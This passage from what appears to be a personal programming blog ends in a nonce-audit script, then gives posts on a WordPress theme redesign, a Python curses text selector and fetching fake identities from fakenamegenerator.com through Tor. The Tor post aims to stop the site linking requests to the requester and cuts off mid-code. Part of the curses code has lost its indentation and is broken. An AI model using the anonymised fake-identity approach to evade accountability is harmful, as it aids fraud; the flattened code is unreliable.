    <span class="c1"># was to be checked. We strip duplicates in both lists and show which</span>
    <span class="c1"># remain in 'matches' and aren't in 'checked'.</span>
    <span class="c1"># remark: python is magical!</span>
    <span class="n">clean</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="p">[</span><span class="n">i</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'"'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"'"</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">x</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'[^a-zA-Z0-9_</span><span class="se">\'</span><span class="s1">"]'</span><span class="p">,</span> <span class="n">i</span><span class="p">)]</span>
    <span class="n">m</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">clean</span><span class="p">(</span><span class="n">matches</span><span class="p">))</span>
    <span class="n">c</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">clean</span><span class="p">(</span><span class="n">checked</span><span class="p">))</span>
    <span class="n">z</span> <span class="o">=</span> <span class="n">m</span> <span class="o">-</span> <span class="n">c</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">''' [!] Found </span><span class="si">{0}</span><span class="s1"> strings within nonce creation functions and </span>
<span class="si">{1}</span><span class="s1"> strings in nonce confirming functions. There remain </span><span class="si">{2}</span><span class="s1"> </span>
<span class="s1">strings that are in nonce creation functions, but aren't in </span>
<span class="s1">confirming functions.'''</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">m</span><span class="p">),</span> <span class="nb">len</span><span class="p">(</span><span class="n">c</span><span class="p">),</span> <span class="nb">len</span><span class="p">(</span><span class="n">z</span><span class="p">)))</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">z</span><span class="p">)</span>
<span class="c1"># Simple debugging function.</span>
<span class="k">def</span> <span class="nf">dmsg</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">DEBUG</span><span class="p">:</span>
        <span class="nb">print</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">()</span>
    <span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s2">"basedir"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s2">"starting directory of analysis"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">)</span>
    <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">apply_on_file_content</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">basedir</span><span class="p">,</span> <span class="n">noncescan</span><span class="p">)</span>
    <span class="n">report</span><span class="p">()</span>
</code></pre></div>Major Redesign of incolumitas.com2013-07-24T00:39:00+02:002013-07-24T00:39:00+02:00Nikolai Tschachertag:incolumitas.com,2013-07-24:/2013/07/24/redesign-of-incolumitas/<p>Hello everybody!</p>
<p>I finally found some motivation and time to give my blog a design
upgrade, an endeavour that has been overdue ever since this blog first
saw the light of day ;)</p>
<p>On the technical side, this theme is a complete redevelopment. It's not
finished yet; on the contrary, it's the very first version and there
remain a lot of issues that need to be resolved. For instance, the
majority of the CSS code is still rather dirty and experimental in
nature. Additionally, I want to include an image slideshow based on
<a href="http://unslider.com/" title="unslider">unslider.js</a>. The template function
in your theme would then look something like the following:</p>
<div class="highlight"><pre><span></span><code><span class="x">if ( ! function_exists( 'clearcontent_header_slider' )):</span>
<span class="x">/*</span>
<span class="x"> * This function includes a minimal jquery slideshow into the header of the site. It uses unslider.js in </span>
<span class="x"> * order to achieve this objective. Link to github site: https://github.com/idiot/unslider</span>
<span class="x"> */</span>
<span class="x">function clearcontent_header_slider() {</span>
<span class="x"> ?></span>
<span class="x"> <div class="header-slideshow"></span>
<span class="x"> <ul></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/1.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/2.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/3.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> </ul></span>
<span class="x"> </div></span>
<span class="x"> <script type="text/javascript"></span>
<span class="x"> var $j = jQuery.noConflict();</span>
<span class="x"> // Use jQuery via $j(...) instead of $(..) to prevent name clashes.</span>
<span class="x"> $j(document).ready(function(){</span>
<span class="x"> $j('.header-slideshow').unslider({</span>
<span class="x"> arrows: true,</span>
<span class="x"> fluid: true,</span>
<span class="x"> dots: true</span>
<span class="x"> });</span>
<span class="x"> });</span>
<span class="x"> </script></span>
<span class="x"> </span><span class="cp"><?php</span>
<span class="p">}</span>
<span class="k">endif</span><span class="p">;</span>
</code></pre></div>
<p>Furthermore, the theme is based on _s, a bare starter theme meant to be customized and extended. Its big advantages are good coding standards and a robust architecture, which really helps if you're new to WordPress theme development. Some of the authors are from the Automattic team, essentially the people behind WordPress, which further supports the reputation of _s...
Anyway, expect the design of incolumitas.com to change slightly over the next weeks and months. A few key points I want to incorporate as soon as possible:</p>
<ul>
<li>A static front page (Yes, using front-page.php)</li>
<li>A complete overhaul of my own captcha plugin. Its captchas are really hard to decipher :D</li>
<li>Making the theme design responsive. This is easily said, but hard to achieve.</li>
<li>Uploading all my projects to my GitHub site. And ... </li>
<li>Finally updating GoogleScraper.py</li>
</ul>
<p>That's it for the moment. Stay tuned!
Nikolai</p>Python and curses - A small textbox selection example.2013-06-02T17:03:00+02:002013-06-02T17:03:00+02:00Nikolai Tschachertag:incolumitas.com,2013-06-02:/2013/06/02/python-and-curses-a-small-textbox-selection-example/<p>Hey dear readership :)</p>
<h3>What.</h3>
<p>I recently needed a handy and nice (not just pragmatic) way
to choose between different entities on the command line, each of them
constituting an option. Sure, you can craft a simple menu with
standard I/O functions, but I wanted to explore something different and
more beautiful.</p>
<p>That's how I found <a href="http://docs.python.org/3.3/howto/curses.html">curses</a>, a simple
wrapper around ncurses, the famous BSD/UNIX library for portable
advanced terminal handling.</p>
<p>So I dived into this library. I'd recommend
<a href="http://docs.python.org/3.3/howto/curses.html" title="this">this</a> tutorial to
everyone who wants to deal with this old school stuff...</p>
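<p>For a first impression of the API, here is a minimal sketch of a selection menu, assuming nothing beyond the standard <code>curses</code> module. The names <code>format_option</code>, <code>move_selection</code> and <code>show_menu</code> are made up for this illustration and are not part of my script; <code>curses.wrapper</code> takes care of setting up and restoring the terminal.</p>

```python
import curses


def format_option(index, label):
    """Return the caption of one menu entry (hypothetical helper)."""
    return '0x{0:X} - {1}'.format(index, label)


def move_selection(current, key, count):
    """Return the new selected index after a key press.

    The index is clamped to the range [0, count - 1]; keys other than
    the up/down arrows leave the selection unchanged.
    """
    if key == curses.KEY_UP:
        return max(0, current - 1)
    if key == curses.KEY_DOWN:
        return min(count - 1, current + 1)
    return current


def show_menu(stdscr, options):
    """Draw all options, highlight the selected one and return the
    option picked with Enter. Meant to be called via curses.wrapper()."""
    curses.curs_set(0)  # hide the terminal cursor
    selected = 0
    while True:
        stdscr.erase()
        for i, label in enumerate(options):
            # The selected entry is drawn in reverse video.
            attr = curses.A_REVERSE if i == selected else curses.A_NORMAL
            stdscr.addstr(i, 0, format_option(i, label), attr)
        stdscr.refresh()
        key = stdscr.getch()
        if key in (curses.KEY_ENTER, ord('\n'), ord('\r')):
            return options[selected]
        selected = move_selection(selected, key, len(options))
```

<p>In a real terminal, <code>curses.wrapper(show_menu, ['first', 'second', 'third'])</code> should return the entry picked with Enter. The sketch does not scroll, so it assumes that all options fit on the screen.</p>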
<h3>How.</h3>
<p>You can check out the latest version of the script on my
<a href="https://github.com/NikolaiT/Scripts/blob/master/scripts/python/curses/text_selector.py">github</a>
site. Here is a copy, for everyone too lazy to look it up:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">curses</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 02.06.2013</span>
<span class="k">class</span> <span class="nc">BoxSelector</span><span class="p">:</span>
    <span class="sd">""" Originally designed for accman.py.</span>
<span class="sd">    Display options built from a list of strings in a (unix) terminal.</span>
<span class="sd">    The user can browse through the textboxes and select one with enter.</span>
<span class="sd">    """</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">L</span><span class="p">):</span>
        <span class="sd">""" Create a BoxSelector object.</span>
<span class="sd">        L is a list of strings. Each string is used to build</span>
<span class="sd">        a textbox.</span>
<span class="sd">        """</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">L</span> <span class="o">=</span> <span class="n">L</span>
        <span class="c1"># Element parameters. Change them here.</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span> <span class="o">=</span> <span class="mi">50</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span> <span class="o">=</span> <span class="mi">6</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">PAD_WIDTH</span> <span class="o">=</span> <span class="mi">400</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">PAD_HEIGHT</span> <span class="o">=</span> <span class="mi">10000</span>
    <span class="k">def</span> <span class="nf">pick</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="sd">""" Just run this when you want to spawn the selection process. """</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_init_curses</span><span class="p">()</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_create_pad</span><span class="p">()</span>
        <span class="n">windows</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_make_textboxes</span><span class="p">()</span>
        <span class="n">picked</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_select_textbox</span><span class="p">(</span><span class="n">windows</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_end_curses</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">picked</span>
    <span class="k">def</span> <span class="nf">_init_curses</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="sd">""" Inits the curses application """</span>
        <span class="c1"># initscr() returns a window object representing the entire screen.</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span> <span class="o">=</span> <span class="n">curses</span><span class="o">.</span><span class="n">initscr</span><span class="p">()</span>
        <span class="c1"># turn off automatic echoing of keys to the screen</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">noecho</span><span class="p">()</span>
        <span class="c1"># Enable cbreak mode: keys are read immediately, without waiting for enter.</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">cbreak</span><span class="p">()</span>
        <span class="c1"># Hide the terminal cursor.</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">curs_set</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="c1"># Let curses translate special keys (e.g. arrow keys) into curses.KEY_* values.</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">keypad</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="c1"># Enable colored output.</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">start_color</span><span class="p">()</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">init_pair</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_BLACK</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_GREEN</span><span class="p">)</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">init_pair</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_WHITE</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_BLACK</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">bkgd</span><span class="p">(</span><span class="n">curses</span><span class="o">.</span><span class="n">color_pair</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">refresh</span><span class="p">()</span>
    <span class="k">def</span> <span class="nf">_end_curses</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="sd">""" Terminates the curses application. """</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">nocbreak</span><span class="p">()</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">keypad</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">echo</span><span class="p">()</span>
        <span class="n">curses</span><span class="o">.</span><span class="n">endwin</span><span class="p">()</span>
    <span class="k">def</span> <span class="nf">_create_pad</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="sd">""" Creates a big self.pad to place the textboxes in. """</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">pad</span> <span class="o">=</span> <span class="n">curses</span><span class="o">.</span><span class="n">newpad</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">PAD_HEIGHT</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">PAD_WIDTH</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">pad</span><span class="o">.</span><span class="n">box</span><span class="p">()</span>
    <span class="k">def</span> <span class="nf">_make_textboxes</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="sd">""" Build the textboxes, stack them vertically and put them in the</span>
<span class="sd">        horizontal middle of the pad. """</span>
        <span class="c1"># Get the actual screensize.</span>
        <span class="n">maxy</span><span class="p">,</span> <span class="n">maxx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getmaxyx</span><span class="p">()</span>
        <span class="n">windows</span> <span class="o">=</span> <span class="p">[]</span>
        <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span>
        <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">L</span><span class="p">:</span>
            <span class="n">windows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">pad</span><span class="o">.</span><span class="n">derwin</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span><span class="p">,</span>
                <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">PAD_WIDTH</span><span class="o">//</span><span class="mi">2</span><span class="o">-</span><span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span><span class="o">//</span><span class="mi">2</span><span class="p">))</span>
            <span class="n">i</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span>
        <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">windows</span><span class="p">)):</span>
            <span class="n">windows</span><span class="p">[</span><span class="n">k</span><span class="p">]</span><span class="o">.</span><span class="n">box</span><span class="p">()</span>
            <span class="n">windows</span><span class="p">[</span><span class="n">k</span><span class="p">]</span><span class="o">.</span><span class="n">addstr</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s1">'0x</span><span class="si">{0:X}</span><span class="s1"> - </span><span class="si">{1}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">k</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">L</span><span class="p">[</span><span class="n">k</span><span class="p">]))</span>
        <span class="k">return</span> <span class="n">windows</span>
    <span class="k">def</span> <span class="nf">_center_view</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">window</span><span class="p">):</span>
        <span class="sd">""" Centers and aligns the view according to the window argument given.</span>
<span class="sd">        Returns the (y, x) coordinates of the centered window. """</span>
        <span class="c1"># The refresh() and noutrefresh() methods of a self.pad require 6 arguments</span>
        <span class="c1"># to specify the part of the self.pad to be displayed and the location on</span>
        <span class="c1"># the screen to be used for the display. The arguments are pminrow,</span>
        <span class="c1"># pmincol, sminrow, smincol, smaxrow, smaxcol; the p arguments refer</span>
        <span class="c1"># to the upper left corner of the self.pad region to be displayed and the</span>
        <span class="c1"># s arguments define a clipping box on the screen within which the</span>
        <span class="c1"># self.pad region is to be displayed.</span>
        <span class="n">cy</span><span class="p">,</span> <span class="n">cx</span> <span class="o">=</span> <span class="n">window</span><span class="o">.</span><span class="n">getbegyx</span><span class="p">()</span>
        <span class="n">maxy</span><span class="p">,</span> <span class="n">maxx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getmaxyx</span><span class="p">()</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">pad</span><span class="o">.</span><span class="n">refresh</span><span class="p">(</span><span class="n">cy</span><span class="p">,</span> <span class="n">cx</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">maxx</span><span class="o">//</span><span class="mi">2</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span><span class="o">//</span><span class="mi">2</span><span class="p">,</span> <span class="n">maxy</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">maxx</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="p">(</span><span class="n">cy</span><span class="p">,</span> <span class="n">cx</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">_select_textbox</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">windows</span><span class="p">):</span>
<span class="c1"># See at the root textbox.</span>
<span class="n">topy</span><span class="p">,</span> <span class="n">topx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_center_view</span><span class="p">(</span><span class="n">windows</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">current_selected</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">last</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">top_textbox</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="c1"># Highlight the selected one, the last selected textbox should</span>
<span class="c1"># become normal again.</span>
<span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span><span class="o">.</span><span class="n">bkgd</span><span class="p">(</span><span class="n">curses</span><span class="o">.</span><span class="n">color_pair</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
<span class="n">windows</span><span class="p">[</span><span class="n">last</span><span class="p">]</span><span class="o">.</span><span class="n">bkgd</span><span class="p">(</span><span class="n">curses</span><span class="o">.</span><span class="n">color_pair</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
<span class="c1"># While the textbox can be displayed on the page with the current </span>
<span class="c1"># top_textbox, don't alter the view. When this becomes impossible, </span>
<span class="c1"># center the view to last displayable textbox on the previous view.</span>
<span class="n">maxy</span><span class="p">,</span> <span class="n">maxx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getmaxyx</span><span class="p">()</span>
<span class="n">cy</span><span class="p">,</span> <span class="n">cx</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span><span class="o">.</span><span class="n">getbegyx</span><span class="p">()</span>
<span class="c1"># The current window is too far down. Switch the top textbox.</span>
<span class="k">if</span> <span class="p">((</span><span class="n">topy</span> <span class="o">+</span> <span class="n">maxy</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span><span class="p">)</span> <span class="o"><=</span> <span class="n">cy</span><span class="p">):</span>
<span class="n">top_textbox</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span>
<span class="c1"># The current window is too far up. There is a better way though...</span>
<span class="k">if</span> <span class="n">topy</span> <span class="o">>=</span> <span class="n">cy</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span><span class="p">:</span>
<span class="n">top_textbox</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span>
<span class="k">if</span> <span class="n">last</span> <span class="o">!=</span> <span class="n">current_selected</span><span class="p">:</span>
<span class="n">last</span> <span class="o">=</span> <span class="n">current_selected</span>
<span class="n">topy</span><span class="p">,</span> <span class="n">topx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_center_view</span><span class="p">(</span><span class="n">top_textbox</span><span class="p">)</span>
<span class="n">c</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getch</span><span class="p">()</span>
<span class="c1"># Vim like KEY_UP/KEY_DOWN with j(DOWN) and k(UP).</span>
<span class="k">if</span> <span class="n">c</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">'j'</span><span class="p">):</span>
<span class="k">if</span> <span class="n">current_selected</span> <span class="o">>=</span> <span class="nb">len</span><span class="p">(</span><span class="n">windows</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># wrap around.</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">elif</span> <span class="n">c</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">'k'</span><span class="p">):</span>
<span class="k">if</span> <span class="n">current_selected</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">windows</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span> <span class="c1"># wrap around.</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">-=</span> <span class="mi">1</span>
<span class="k">elif</span> <span class="n">c</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">'q'</span><span class="p">):</span> <span class="c1"># Quit without selecting.</span>
<span class="k">break</span>
<span class="c1"># At hitting enter, return the index of the selected list element.</span>
<span class="k">elif</span> <span class="n">c</span> <span class="o">==</span> <span class="n">curses</span><span class="o">.</span><span class="n">KEY_ENTER</span> <span class="ow">or</span> <span class="n">c</span> <span class="o">==</span> <span class="mi">10</span><span class="p">:</span>
<span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">current_selected</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="c1"># As simple as that.</span>
<span class="n">L</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'I wish I was a wizard'</span><span class="p">,</span>
<span class="s1">'Sometimes it all just makes sense'</span><span class="p">,</span>
<span class="s1">'This string is here because I need it'</span><span class="p">,</span>
<span class="s1">'Being or not being!'</span><span class="p">,</span>
<span class="s1">'Python is worse then PHP ;)'</span><span class="p">,</span>
<span class="s1">'a -> b <=> if a then b'</span>
<span class="p">]</span>
<span class="n">choice</span> <span class="o">=</span> <span class="n">BoxSelector</span><span class="p">(</span><span class="n">L</span><span class="p">)</span><span class="o">.</span><span class="n">pick</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Your choice was "</span><span class="si">{0}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">L</span><span class="p">[</span><span class="n">choice</span><span class="p">]))</span>
</code></pre></div>
<p>As you can see, it is very easy to build such a browsable text selection
command line interface. Just pass your list of strings to the BoxSelector
class and call its pick() method, which sets up the whole terminal
interface and returns once the user picks a textbox by hitting
enter.</p>
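<p>The j/k navigation in <code>_select_textbox()</code> wraps around at both ends of the list. As a minimal sketch, the same index arithmetic can be written without any curses code; <code>move_selection()</code> is a hypothetical helper that is not part of the script above:</p>

```python
def move_selection(current, key, count):
    """Return the selected index after pressing `key` in a list of `count` items.

    'j' moves down and 'k' moves up, both wrapping around at the ends.
    Any other key leaves the selection unchanged.
    """
    if count <= 0:
        raise ValueError('count must be positive')
    if key == 'j':
        return (current + 1) % count
    if key == 'k':
        # Python's modulo is never negative here, so -1 wraps to count - 1.
        return (current - 1) % count
    return current
```

<p>Using the modulo operator replaces the two if/else branches, at the price of being slightly less explicit about the wrap-around.</p>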
<p>Here is a little picture illustrating the above example:<br>
<img alt="text_selector.py illustration" src="https://incolumitas.com/uploads/2013/06/Bildschirmfoto-vom-2013-06-02-190913-1024x576.png"></p>Create anonymous identities with fakenamegenerator.com and Python2013-05-30T14:14:00+02:002013-05-30T14:14:00+02:00Nikolai Tschachertag:incolumitas.com,2013-05-30:/2013/05/30/create-anonymous-identites-with-fakenamegenerator-com-and-python/<h3>Introduction</h3>
<p>Woah, it has been a hell of a long time since I posted my last
contribution (I feel like I always begin my blog posts with these
introductory words). However, today I want to show you how to forge
random identities with a site called
<a href="http://fakenamegenerator.com">fakenamegenerator.com</a>. I use Python 3
and an unofficial branch of
<a href="http://socksipy.sourceforge.net/" title="socksipy">socksipy</a>, a nice module
which enables you to tunnel TCP/IP streams through a remote server,
commonly used to disguise your real IP address. There are three available
modes: SOCKS4, SOCKS5 and HTTP. In this blog post, I use SOCKS5, since I
run Tor locally and route my requests through its proxy listening on
127.0.0.1:9050.</p>
<h3>Why and what</h3>
<p>The team behind fakenamegenerator.com writes on their site:</p>
<blockquote>
<p><em><strong>Name:</strong> Names are generated by randomly pulling a first and a last
name out of a database. The database was compiled from public domain
sources. [...]</em></p>
<p><em><strong>Street address:</strong> The house number is a randomly generated number.
The street name is pulled from a database of plausible street names
for the state/country being generated. Odds are that the generated
street address is not valid.</em></p>
<p><em><strong>City, state, and postal code:</strong> We have compiled a database
containing hundreds of thousands of valid city, state, and postal code
combinations. One of these combinations is randomly pulled from the
database for each identity.</em></p>
<p><em><strong>Telephone number:</strong> We have compiled a database of valid area codes
and prefixes. One of these combinations is randomly pulled from the
database, and then a random number of the appropriate length is added
to the end to make the phone number the correct length.</em></p>
<p><em><strong>Mother's maiden name:</strong> A random name is pulled from our database
of last names, and listed as the "mother's maiden name".</em></p>
<p><em><strong>Birthday:</strong> The birthday is a randomly generated date. [...]</em></p>
</blockquote>
<p>Furthermore, and here we come to the reason for this blog post:</p>
<blockquote>
<p>We <strong>do not</strong> condone, support, or encourage illegal activity of any
kind. We <strong>will</strong> cooperate with law enforcement organizations to
assist in the prosecution of anyone that misuses the information we
provide or that asks us to provide illegal materials, such as forged
documents or genuine credit card numbers.</p>
</blockquote>
<p>I am convinced that they map every identity requested by a client to the
corresponding IP address. Therefore, the generated identity is not
anonymous, because your IP address can be mapped to your real identity
through your internet service provider.</p>
<h3>Solution</h3>
<p>Here is what I came up with to make the retrieval of identities
anonymous. This is the example function <code>anon_identity()</code>, which calls the function
<code>scrape_identity()</code>, which in turn extracts all the pieces constituting
the identity from fakenamegenerator.com. You can implement your own
application logic with <code>scrape_identity()</code>. It just returns a list of
tuples, where each tuple contains the element name (such as 'name',
'birthdate', 'gender' ...) and the corresponding value.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">urllib.request</span>
<span class="kn">import</span> <span class="nn">socks</span>  <span class="c1"># the unofficial socksipy branch mentioned above</span>

<span class="k">def</span> <span class="nf">anon_identity</span><span class="p">():</span>
    <span class="sd">"""This function is an example of how to use scrape_identity() anonymously</span>
<span class="sd">    through Tor. Used like that, you don't have to worry that your generated</span>
<span class="sd">    identity is matched to your IP address and therefore to your real identity.</span>
<span class="sd">    """</span>
    <span class="c1"># Set up a SOCKS socket. You might want to fire up your local Tor proxy before</span>
    <span class="c1"># using this function.</span>
    <span class="c1"># Just download Tor here https://www.torproject.org/ and then start tor.</span>
    <span class="n">socks</span><span class="o">.</span><span class="n">setdefaultproxy</span><span class="p">(</span><span class="n">socks</span><span class="o">.</span><span class="n">PROXY_TYPE_SOCKS5</span><span class="p">,</span> <span class="s1">'127.0.0.1'</span><span class="p">,</span> <span class="mi">9050</span><span class="p">)</span>
    <span class="n">socks</span><span class="o">.</span><span class="n">wrapmodule</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="p">)</span>
    <span class="c1"># scrape_identity() is defined in the same module and returns (name, value) tuples.</span>
